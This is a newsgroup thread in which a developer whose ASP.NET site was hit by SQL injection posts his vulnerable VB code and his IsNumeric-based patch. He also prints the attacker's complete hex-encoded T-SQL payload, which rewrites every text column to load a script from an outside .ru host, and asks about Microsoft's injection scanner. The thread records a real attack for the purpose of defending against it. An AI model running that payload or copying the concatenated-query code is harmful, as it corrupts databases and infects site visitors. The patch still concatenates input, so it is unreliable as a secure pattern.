By teh way, I took a look at the page where this happened and realized what
they did. Here's what I used to have:
Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArg s) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QuerySt ring("Classmate ID") <"" Then
dsClassmates.Se lectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Ap proved_ForSite] WHERE ClassmateID = " &
Request.QuerySt ring("Classmate ID")
dsClassmates.Da taBind()
End If
End If
End Sub
Here's what I chagned it to (the line that tests for IsNumeric is new):
Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArg s) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QuerySt ring("Classmate ID") <"" Then
If IsNumeric(Reque st.QueryString( "ClassmateI D")) And
(Len(Request.Qu eryString("Clas smateID").ToStr ing) < 6) Then
dsClassmates.Se lectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Ap proved_ForSite] WHERE ClassmateID = " &
Request.QuerySt ring("Classmate ID")
dsClassmates.Da taBind()
End If
End If
End If
End Sub
I'm thinking that solves my problem in this spot. Does that make sense? This
is what the hacker did:
ClassmateID=616 ;DECLARE%20@S%2 0VARCHAR(4000); SET%20@S=CAST(0 x4445434C415245 2
040542056415243 484152283235352 92C404320564152 434841522832353 529204445434C41 5
245205461626C65 5F437572736F722 0435552534F5220 464F522053454C4 5435420612E6E61 6
D652C622E6E616D 652046524F4D207 379736F626A6563 747320612C73797 3636F6C756D6E73 2
062205748455245 20612E69643D622 E696420414E4420 612E78747970653 D27752720414E44 2
028622E78747970 653D3939204F522 0622E7874797065 3D3335204F52206 22E78747970653D 3
23331204F522062 2E78747970653D3 1363729204F5045 4E205461626C655 F437572736F7220 4
645544348204E45 58542046524F4D2 05461626C655F43 7572736F7220494 E544F2040542C40 4
3205748494C4528 404046455443485 F5354415455533D 302920424547494 E20455845432827 5
55044415445205B 272B40542B275D2 0534554205B272B 40432B275D3D525 452494D28434F4E 5
645525428564152 434841522834303 030292C5B272B40 432B275D29292B2 7273C7363726970 7
4207372633D6874 74703A2F2F77777 72E706F72762E72 752F6A732E6A733 E3C2F7363726970 7
43E272727292046 45544348204E455 8542046524F4D20 5461626C655F437 572736F7220494E 5
44F2040542C4043 20454E4420434C4 F5345205461626C 655F437572736F7 2204445414C4C4F 4
341544520546162 6C655F437572736 F7220%20AS%20VA RCHAR(4000));EX EC(@S);
So it seems to me if I test for numeric and limit the lenght of the query
string I should be covered.
Any comments?
(still wondering about the MS injection analyzer too also)
Thanks,
Keith
"Keith G Hicks" <kr*@comcast.ne twrote in message
news:#k******** ******@TK2MSFTN GP02.phx.gbl...
I have a site that is made up of sevearl aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.
Here's an example from the readme.html file for the tool:
msscasi_asp.exe /input="c:\sourc e\logon.asp" /output="warning s.xml"
Here's one of the warnigns I get:
** msscasi_asp: Parse warning at C:\Inetpub\wwwr oot\MySite\logo n.aspx
(line
2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.
And there's nothing in my output file. It looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->
What do I do to run this on my aspx pages?
Can anyone help me out here? If I'm in the wrong newsgroup for this,
please
tell me where I should post instead.
Thanks,
Keith